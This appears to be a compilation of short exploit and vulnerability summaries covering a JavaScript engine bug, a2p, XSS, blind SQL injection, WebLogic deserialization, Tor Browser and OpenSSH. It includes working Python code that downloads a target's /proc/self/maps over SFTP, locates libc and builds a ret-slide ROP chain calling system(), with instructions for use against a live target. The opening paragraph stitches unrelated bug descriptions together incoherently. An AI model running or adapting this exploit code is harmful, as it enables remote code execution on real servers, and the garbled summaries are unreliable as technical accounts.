This PoC targets a buffer overflow in the target's global optimization phase. It is written in JavaScript and uses a loop to overflow the buffer with the string 'AAAAAAAAAA' + str + 'BBBBBBBBBB'; the loop runs 200 times, which is enough to push the data past the buffer's bounds.
BoundFunction::NewInstance handles calls to a bound function. It first allocates a new argument array, copies the bound (prepended) arguments and the caller's arguments into it, and then calls the target function. The problem is that it ignores the CallFlags_ExtraArg flag, which indicates that there is one extra argument (new.target in the PoC) at the end of the argument array. When that flag is set, the new argument array is therefore always one element smaller than required, which leads to an out-of-bounds read.
This issue is similar to issue 1429 (MSRC 42111). The page may need to be refreshed several times before the crash is observed. The PoC creates a Uint32Array of 1000 elements and then iterates over it, setting each element to 0x1234, which triggers the memory corruption.
A buffer overflow exists in the Linux Awk-to-Perl translator '/usr/bin/a2p', version 1.007-5. Supplying a long string of 'A' characters as input triggers a segmentation fault. A segmentation fault by itself only proves a crash; the advisory claims the overflow can be exploited to execute arbitrary code.
Instagram-clone Script 2.0 is vulnerable to cross-site scripting because 'edit_requests.php' does not sufficiently sanitize user-supplied input. An attacker can exploit this to execute arbitrary HTML and script code in the victim's browser in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This exploit is based on a misconfiguration in OpenSSH versions 6.6 and below. It was originally discovered by Jann Horn and further developed by Adam Simuntis and Mindaugas Slusnys. The exploit uses the Paramiko library to connect to the SSH server, downloads the server process's /proc/self/maps to identify the address at which libc is mapped, then downloads the libc library itself and extracts the addresses of system() and exit(). From these it builds a payload, writes it to the remote system and executes it; the payload starts with a ret slide (a run of 'ret' gadgets) that leads into a call to system() with the command specified in the payload.
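As an added example (not the exploit's own code), here is the maps-parsing and payload-layout step of that procedure in Python: a parser for /proc/self/maps that locates the libc mapping and the stack, and a builder for a little-endian x86-64 payload with a ret slide ahead of system()/exit(). The sample maps text is constructed; the architecture, the gadget and function offsets and the command-string address are hypothetical inputs (on a real target they come from the downloaded libc); fetch_maps_via_sftp is an assumed Paramiko transport that the offline parts do not use.

```python
import re
import struct

# Constructed sample of a /proc/self/maps file as it would be downloaded from the
# server process (not a real capture).
SAMPLE_MAPS = """\
55d4c2a00000-55d4c2a2c000 r-xp 00000000 08:01 1311    /usr/lib/openssh/sftp-server
55d4c2c2b000-55d4c2c2d000 rw-p 0002b000 08:01 1311    /usr/lib/openssh/sftp-server
7f3a1c3e1000-7f3a1c59c000 r-xp 00000000 08:01 2206    /lib/x86_64-linux-gnu/libc-2.19.so
7f3a1c59c000-7f3a1c79c000 ---p 001bb000 08:01 2206    /lib/x86_64-linux-gnu/libc-2.19.so
7f3a1c79c000-7f3a1c7a0000 r--p 001bb000 08:01 2206    /lib/x86_64-linux-gnu/libc-2.19.so
7f3a1c7a0000-7f3a1c7a2000 rw-p 001bf000 08:01 2206    /lib/x86_64-linux-gnu/libc-2.19.so
7ffd5e6c3000-7ffd5e6e4000 rw-p 00000000 00:00 0       [stack]
"""

MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>\S{4})\s+(?P<off>[0-9a-f]+)"
    r"\s+\S+\s+\d+\s*(?P<path>.*)$")


def parse_maps(text):
    """Parse /proc/<pid>/maps into a list of (start, end, perms, file_offset, path)."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if m:
            regions.append((int(m["start"], 16), int(m["end"], 16),
                            m["perms"], int(m["off"], 16), m["path"]))
    return regions


def find_libc(regions):
    """Return (base, path) of libc: the lowest libc mapping whose file offset is 0."""
    cands = [r for r in regions if re.search(r"/libc[-.][^/]*so", r[4]) and r[3] == 0]
    if not cands:
        raise ValueError("libc not found in maps")
    start, _end, _perms, _off, path = min(cands)
    return start, path


def find_region(regions, path):
    """First mapping whose path equals `path`, e.g. '[stack]'."""
    for r in regions:
        if r[4] == path:
            return r
    return None


def build_ret_slide_payload(libc_base, system_off, exit_off, pop_rdi_off, cmd_addr,
                            slide_len=64):
    """x86-64 little-endian ROP chain: a slide of bare 'ret's (so an imprecise return
    address overwrite still lands on it), then pop rdi; ret -> system(cmd) -> exit().
    All offsets are hypothetical inputs that must be read from the downloaded libc."""
    # 'pop rdi; ret' is 5f c3, so its second byte is a bare 'ret' gadget.
    ret = libc_base + pop_rdi_off + 1
    chain = [ret] * slide_len
    chain += [libc_base + pop_rdi_off, cmd_addr, libc_base + system_off, libc_base + exit_off]
    return b"".join(struct.pack("<Q", addr) for addr in chain)


def fetch_maps_via_sftp(host, username, password, port=22):
    """Download the server process's own /proc/self/maps over SFTP (requires paramiko)."""
    import paramiko  # imported here so the offline functions above run without it
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(host, port=port, username=username, password=password)
    sftp = client.open_sftp()
    with sftp.open("/proc/self/maps") as f:
        data = f.read().decode()
    client.close()
    return data
```

Against a live target, pass the text returned by fetch_maps_via_sftp to parse_maps; find_region(regions, "[stack]") gives the writable range the payload has to land in, and the libc base from find_libc is what the extracted system()/exit() offsets are added to.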
We have discovered a time-based blind SQL injection vulnerability in the ELO Access Manager (<= 9.17.120 and <= 10.17.120) component that makes it possible to read all database content. The vulnerability exists in the HTTP GET parameter 'ticket'. For example, we succeeded in reading the password hash of the administrator user in the 'userdata' table from the 'eloam' database.
This script is the first public exploit/PoC for CVE-2017-3248, a Java deserialization vulnerability in the Oracle WebLogic RMI Registry (UnicastRef object) that allows remote code execution. It checks whether a WebLogic server is vulnerable and requires the latest version of ysoserial. Affected versions are 10.3.6.0, 12.1.3.0, 12.2.1.0 and 12.2.1.1.
This exploit is a proof of concept for a use-after-free in Tor Browser. It is triggered by creating a frameset element, appending a child element to it, and then adding a DOMAttrModified event listener to the frameset. The resulting use-after-free is used here to cause a denial of service (a crash).
SeoChecker Umbraco CMS Plug-in version 1.9.2 is vulnerable to stored cross-site scripting in two parameters, the SEO title and SEO description HTML fields. A low-privilege authenticated user who can edit the SEO tab values for any Umbraco CMS content item (for example an article) can inject malicious code that executes arbitrary HTML and JavaScript in a user's browser session in the context of the affected site.